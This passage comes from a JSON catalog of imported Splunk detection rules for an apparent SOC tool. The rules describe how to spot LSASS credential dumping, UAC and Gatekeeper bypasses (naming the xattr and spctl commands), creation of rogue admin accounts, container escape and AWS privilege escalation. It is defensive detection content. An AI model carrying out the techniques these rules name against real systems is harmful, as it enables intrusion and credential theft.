`Get-WmiObject` cmdlet with the `DS_Computer` class parameter via PowerShell Script Block Logging (EventCode=4104). This detection leverages script block text to identify queries targeting domain computers using WMI. Monitoring this activity is crucial as adversaries and Red Teams may use it for Active Directory Discovery and situational awareness. 
If confirmed malicious, this behavior could allow attackers to map out domain computers, facilitating further attacks such as lateral movement or privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-computer-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "29b99201-723c-4118-847a-db2b3d3fb8ea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_computer_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-29eb39d3-2bc8-49cc-99b3-35593191a588", "type": "detection", "name": "Azure AD Service Principal Privilege Escalation", "description": "This detection identifies when an Azure Service Principal elevates privileges by adding themself to a new app role assignment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "29eb39d3-2bc8-49cc-99b3-35593191a588", "source_commit": "4d4c7ee", "license": 
"Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_privilege_escalation.yml" } }, { "id": "splunk-security-content-2a048c14-4634-11ec-a618-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WMI and PowerShell Script Block", "description": "The following analytic detects the execution of the `Invoke-WmiMethod` cmdlet with parameters used to start a process on a remote endpoint via WMI, leveraging PowerShell Script Block Logging (EventCode=4104). This method identifies specific script block text patterns associated with remote process instantiation. This activity is significant as it may indicate lateral movement or remote code execution attempts by adversaries. If confirmed malicious, this could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-wmi-and-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a048c14-4634-11ec-a618-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_wmi_and_powershell_script_block.yml" } }, { "id": "splunk-security-content-2a371608-331d-4034-ae2c-21dda8f1d0ec", "type": 
"detection", "name": "Processes Tapping Keyboard Events", "description": "The following analytic detects processes on macOS systems that are tapping keyboard events, potentially monitoring all keystrokes made by a user. It leverages data from osquery results within the Alerts data model, focusing on specific process names and command lines. This activity is significant as it is a common technique used by Remote Access Trojans (RATs) to log keystrokes, posing a serious security risk. If confirmed malicious, this could lead to unauthorized access to sensitive information, including passwords and personal data, compromising the integrity and confidentiality of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/processes-tapping-keyboard-events.yaml", "provenance": { "source": "splunk/security_content", "source_id": "2a371608-331d-4034-ae2c-21dda8f1d0ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/processes_tapping_keyboard_events.yml" } }, { "id": "splunk-security-content-2a9b80d3-6220-4345-b5ad-290bf5d0d222", "type": "detection", "name": "Detect Spike in AWS Security Hub Alerts for User", "description": "The following analytic identifies a spike in the number of AWS Security Hub alerts for an AWS IAM User within a 4-hour interval. It leverages AWS Security Hub findings data, calculating the average and standard deviation of alerts to detect significant deviations. This activity is significant as a sudden increase in alerts for a specific user may indicate suspicious behavior or a potential security incident. 
If confirmed malicious, this could signify an ongoing attack, unauthorized access, or misuse of IAM credentials, potentially leading to data breaches or further exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-spike-in-aws-security-hub-alerts-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6220-4345-b5ad-290bf5d0d222", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_spike_in_aws_security_hub_alerts_for_user.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-11ad-212bf3d0d111", "type": "detection", "name": "AWS CreateAccessKey", "description": "The following analytic identifies the creation of AWS IAM access keys by a user for another user, which can indicate privilege escalation. It leverages AWS CloudTrail logs to detect instances where the user creating the access key is different from the user for whom the key is created. This activity is significant because unauthorized access key creation can allow attackers to establish persistence or exfiltrate data via AWS APIs. 
If confirmed malicious, this could lead to unauthorized access to AWS services, data exfiltration, and long-term persistence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-createaccesskey.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-11ad-212bf3d0d111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_createaccesskey.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-11ad-212bf3d0dac4", "type": "detection", "name": "AWS SetDefaultPolicyVersion", "description": "The following analytic detects when a user sets a default policy version in AWS. It leverages AWS CloudTrail logs to identify the `SetDefaultPolicyVersion` event from the IAM service. This activity is significant because attackers may exploit this technique for privilege escalation, especially if previous policy versions grant more extensive permissions than the current one. 
If confirmed malicious, this could allow an attacker to gain elevated access to AWS resources, potentially leading to unauthorized actions and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-setdefaultpolicyversion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-11ad-212bf3d0dac4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_setdefaultpolicyversion.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-11ad-212bf444d111", "type": "detection", "name": "AWS CreateLoginProfile", "description": "The following analytic identifies the creation of a login profile for one AWS user by another, followed by a console login from the same source IP. It uses AWS CloudTrail logs to correlate the `CreateLoginProfile` and `ConsoleLogin` events based on the source IP and user identity. This activity is significant as it may indicate privilege escalation, where an attacker creates a new login profile to gain unauthorized access. 
If confirmed malicious, this could allow the attacker to escalate privileges and maintain persistent access to the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-createloginprofile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-11ad-212bf444d111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_createloginprofile.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-b5ad-212bf3d0dac4", "type": "detection", "name": "AWS Create Policy Version to allow all resources", "description": "The following analytic identifies the creation of a new AWS IAM policy version that allows access to all resources. It detects this activity by analyzing AWS CloudTrail logs for the CreatePolicyVersion event with a policy document that grants broad permissions. This behavior is significant because it violates the principle of least privilege, potentially exposing the environment to misuse or abuse. 
If confirmed malicious, an attacker could gain extensive access to AWS resources, leading to unauthorized actions, data exfiltration, or further compromise of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-create-policy-version-to-allow-all-resources.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-b5ad-212bf3d0dac4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_create_policy_version_to_allow_all_resources.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-b5ad-290bf3d0dac4", "type": "detection", "name": "Detect New Open S3 buckets", "description": "The following analytic identifies the creation of open/public S3 buckets in AWS. It detects this activity by analyzing AWS CloudTrail events for `PutBucketAcl` actions where the access control list (ACL) grants permissions to all users or authenticated users. This activity is significant because open S3 buckets can expose sensitive data to unauthorized access, leading to data breaches. 
If confirmed malicious, an attacker could read, write, or fully control the contents of the bucket, potentially leading to data exfiltration or tampering. Note that, as described, this analytic covers ACL-based grants only; public exposure granted through a bucket policy is outside its scope and needs separate coverage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-new-open-s3-buckets.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-b5ad-290bf3d0dac4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_new_open_s3_buckets.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-b5ad-290bf3d222c4", "type": "detection", "name": "AWS EC2 Snapshot Shared Externally", "description": "The following analytic detects when an EC2 snapshot is shared with an external AWS account by analyzing AWS CloudTrail events. This detection method leverages CloudTrail logs to identify modifications in snapshot permissions (the ModifySnapshotAttribute event), specifically when the snapshot is shared outside the originating AWS account. This activity is significant as it may indicate an attempt to exfiltrate sensitive data stored in the snapshot. 
If confirmed malicious, an attacker could gain unauthorized access to the snapshot's data, potentially leading to data breaches or further exploitation of the compromised information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1537" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-ec2-snapshot-shared-externally.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-b5ad-290bf3d222c4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_ec2_snapshot_shared_externally.yml" } }, { "id": "splunk-security-content-2a9b80d3-6340-4345-b5ad-290bf5d0d222", "type": "detection", "name": "Detect Spike in AWS Security Hub Alerts for EC2 Instance", "description": "The following analytic identifies a spike in the number of AWS Security Hub alerts for an EC2 instance within a 4-hour interval. It leverages AWS Security Hub findings data, calculating the average and standard deviation of alerts to detect anomalies. This activity is significant for a SOC as a sudden increase in alerts may indicate potential security incidents or misconfigurations requiring immediate attention. 
If confirmed malicious, this could signify an ongoing attack, leading to unauthorized access, data exfiltration, or disruption of services on the affected EC2 instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-spike-in-aws-security-hub-alerts-for-ec2-instance.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6340-4345-b5ad-290bf5d0d222", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_spike_in_aws_security_hub_alerts_for_ec2_instance.yml" } }, { "id": "splunk-security-content-2a9b80d3-6a40-4115-11ad-212bf3d0d111", "type": "detection", "name": "AWS UpdateLoginProfile", "description": "The following analytic detects an AWS CloudTrail event where a user with permissions updates the login profile of another user. It leverages CloudTrail logs to identify instances where the user making the change is different from the user whose profile is being updated. This activity is significant because it can indicate privilege escalation attempts, where an attacker uses a compromised account to gain higher privileges. 
If confirmed malicious, this could allow the attacker to escalate their privileges, potentially leading to unauthorized access and control over sensitive resources within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-updateloginprofile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9b80d3-6a40-4115-11ad-212bf3d0d111", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_updateloginprofile.yml" } }, { "id": "splunk-security-content-2a9f3a2e-2c07-4c5f-9e42-8f8f0b6b6a12", "type": "detection", "name": "GitHub Workflow File Creation or Modification", "description": "The following analytic hunts for any creations or modifications to GitHub Actions workflow YAML files across the organization's Linux or Windows endpoints.\nThis hunting query tracks all workflow file activity under .github/workflows directories to help defenders establish baselines of legitimate CI/CD workflow creation patterns, identify unusual or unauthorized changes, and detect anomalies that may indicate supply chain compromise.\nGitHub Actions workflows execute with privileged access to secrets and deployment credentials, making them high-value targets for attackers.\nBy monitoring workflow file modifications over time, defenders can identify suspicious patterns such as unexpected workflow creation on developer workstations, modifications outside normal change windows, or activity in repositories that don't 
typically contain workflows.\nThis data is essential for detecting supply chain attacks like Shai-Hulud that inject malicious workflows across multiple repositories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006", "T1554", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-workflow-file-creation-or-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2a9f3a2e-2c07-4c5f-9e42-8f8f0b6b6a12", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/github_workflow_file_creation_or_modification.yml" } }, { "id": "splunk-security-content-2acf0e19-4149-451c-a3f3-39cd3c77e37d", "type": "detection", "name": "Windows System Binary Proxy Execution Compiled HTML File Decompile", "description": "The following analytic detects the use of the decompile parameter with the HTML Help application (HH.exe). This behavior is identified through Endpoint Detection and Response (EDR) telemetry, focusing on command-line executions involving the decompile parameter. This activity is significant because it is an uncommon command and has been associated with APT41 campaigns, where it was used to unpack HTML help files for further malicious actions. 
If confirmed malicious, this technique could allow attackers to execute arbitrary commands, potentially leading to further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-binary-proxy-execution-compiled-html-file-decompile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2acf0e19-4149-451c-a3f3-39cd3c77e37d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_binary_proxy_execution_compiled_html_file_decompile.yml" } }, { "id": "splunk-security-content-2afa393f-b88d-41b7-9793-623c93a2dfde", "type": "detection", "name": "Windows Cmdline Tool Execution From Non-Shell Process", "description": "The following analytic identifies instances where `ipconfig.exe`, `systeminfo.exe`, or similar tools are executed by a non-standard shell parent process, excluding CMD, PowerShell, or Explorer. This detection leverages Endpoint Detection and Response (EDR) telemetry to monitor process creation events. Such behavior is significant as it may indicate adversaries using injected processes to perform system discovery, a tactic observed in FIN7's JSSLoader. 
If confirmed malicious, this activity could allow attackers to gather critical host information, aiding in further exploitation or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-cmdline-tool-execution-from-non-shell-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2afa393f-b88d-41b7-9793-623c93a2dfde", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_cmdline_tool_execution_from_non_shell_process.yml" } }, { "id": "splunk-security-content-2b8a7a21-bec6-4e1f-84c4-7b319f45d2ab", "type": "detection", "name": "Cisco Isovalent - Potential Escape to Host", "description": "This analytic detects potential container escape or reconnaissance attempts by monitoring for the rapid execution of multiple suspicious Linux commands (nsenter, mount, ps aux, and ls) within a short time window. The search aggregates process execution logs into 5-minute buckets and identifies when two or more distinct commands occur in quick succession. This behavior is noteworthy because attackers often chain these commands together to pivot from a container into the host, enumerate processes, or browse filesystems. 
For a SOC, catching these clustered command executions is important because it highlights possible adversary activity attempting to break isolation and escalate privileges inside a Kubernetes environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1611" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-potential-escape-to-host.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2b8a7a21-bec6-4e1f-84c4-7b319f45d2ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___potential_escape_to_host.yml" } }, { "id": "splunk-security-content-2bb1a362-7aa8-444a-92ed-1987e8da83e1", "type": "detection", "name": "Windows Command Shell DCRat ForkBomb Payload", "description": "The following analytic detects the execution of a DCRat \"forkbomb\" payload, which spawns multiple cmd.exe processes that launch notepad.exe instances in quick succession. This detection leverages Endpoint Detection and Response (EDR) data, focusing on the rapid creation of cmd.exe and notepad.exe processes within a 30-second window. This activity is significant as it indicates a potential DCRat infection, a known Remote Access Trojan (RAT) with destructive capabilities. 
If confirmed malicious, this behavior could lead to system instability, resource exhaustion, and potential disruption of services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-command-shell-dcrat-forkbomb-payload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2bb1a362-7aa8-444a-92ed-1987e8da83e1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_command_shell_dcrat_forkbomb_payload.yml" } }, { "id": "splunk-security-content-2bcccd20-fc2b-11eb-8d22-acde48001122", "type": "detection", "name": "UAC Bypass With Colorui COM Object", "description": "The following analytic detects a potential UAC bypass using the colorui.dll COM Object. It leverages Sysmon EventCode 7 to identify instances where colorui.dll is loaded by a process other than colorcpl.exe, excluding common system directories. This activity is significant because UAC bypass techniques are often used by malware, such as LockBit ransomware, to gain elevated privileges without user consent. 
If confirmed malicious, this could allow an attacker to execute code with higher privileges, leading to further system compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/uac-bypass-with-colorui-com-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2bcccd20-fc2b-11eb-8d22-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/uac_bypass_with_colorui_com_object.yml" } }, { "id": "splunk-security-content-2c0427aa-982c-4e97-bc33-bddeda4fd095", "type": "detection", "name": "Windows Developer-Signed MSIX Package Installation", "description": "This detection identifies the installation of developer-signed MSIX packages that lack Microsoft Store signatures. All malicious MSIX packages observed in recent threat campaigns (including those from FIN7, Zloader/Storm-0569, and FakeBat/Storm-1113) were developer-signed rather than Microsoft Store signed. Microsoft Store apps have specific publisher IDs containing '8wekyb3d8bbwe' or 'cw5n1h2txyewy', while developer-signed packages lack these identifiers. 
This detection focuses on EventID 855 from the Microsoft-Windows-AppXDeployment-Server/Operational logs, which indicates a completed package installation. Because the check is a publisher-ID heuristic, legitimately signed enterprise line-of-business or third-party packages that lack these Microsoft publisher IDs will also match and should be allow-listed during tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-developer-signed-msix-package-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c0427aa-982c-4e97-bc33-bddeda4fd095", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_developer_signed_msix_package_installation.yml" } }, { "id": "splunk-security-content-2c365e57-4414-4540-8dc0-73ab10729996", "type": "detection", "name": "Detect Credential Dumping through LSASS access", "description": "The following analytic detects attempts to read LSASS memory, indicative of credential dumping. It leverages Sysmon EventCode 10 (ProcessAccess), filtering for specific GrantedAccess masks (0x1010 and 0x1410) on the lsass.exe process. This activity is significant because it suggests an attacker is trying to extract credentials from LSASS memory, potentially leading to unauthorized access, data breaches, and compromise of sensitive information. If confirmed malicious, this could enable attackers to escalate privileges, move laterally within the network, or exfiltrate data. 
Extensive triage is necessary to differentiate between malicious and benign activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-credential-dumping-through-lsass-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c365e57-4414-4540-8dc0-73ab10729996", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_credential_dumping_through_lsass_access.yml" } }, { "id": "splunk-security-content-2c568c34-bb57-4b43-9d75-19c605b98e70", "type": "detection", "name": "Windows Create Local Administrator Account Via Net", "description": "The following analytic detects the creation of a local administrator account using the \"net.exe\" command. It leverages Endpoint Detection and Response (EDR) data to identify processes named \"net.exe\" with the \"/add\" parameter and keywords related to administrator accounts. This activity is significant as it may indicate an attacker attempting to gain persistent access or escalate privileges. If confirmed malicious, this could lead to unauthorized access, data theft, or further system compromise. 
Ensure that net1.exe, which net.exe delegates to, is matched as well so the detection cannot be sidestepped by invoking it directly. Review the process details, user context, and related artifacts to determine the legitimacy of the activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-create-local-administrator-account-via-net.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c568c34-bb57-4b43-9d75-19c605b98e70", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_create_local_administrator_account_via_net.yml" } }, { "id": "splunk-security-content-2c853856-a140-11eb-a5b5-acde48001122", "type": "detection", "name": "GPUpdate with no Command Line Arguments with Network", "description": "The following analytic detects the execution of gpupdate.exe without command line arguments and with an active network connection. This behavior is identified using Endpoint Detection and Response (EDR) telemetry, focusing on process execution and network traffic data. It is significant because gpupdate.exe typically runs with specific arguments, and its execution without them, especially with network activity, is often associated with tooling such as Cobalt Strike, which can use it as a sacrificial host process for injected payloads. 
If confirmed malicious, this activity could indicate an attacker leveraging gpupdate.exe for lateral movement, command and control, or other nefarious purposes, potentially leading to system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gpupdate-with-no-command-line-arguments-with-network.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "2c853856-a140-11eb-a5b5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/gpupdate_with_no_command_line_arguments_with_network.yml" } }, { "id": "splunk-security-content-2c9346f3-bbeb-48ce-8411-fc13d09d83a5", "type": "detection", "name": "MacOS Gatekeeper Bypass", "description": "Detects known MacOS security bypass techniques that may be used to enable malicious code execution.\nSpecifically monitors for attempts to remove the com.apple.quarantine attribute using xattr, or to disable Gatekeeper protections via spctl --master-disable, both of which can allow untrusted or malicious applications to execute without standard system safeguards.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1553.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-gatekeeper-bypass.yaml", "provenance": { "source": 
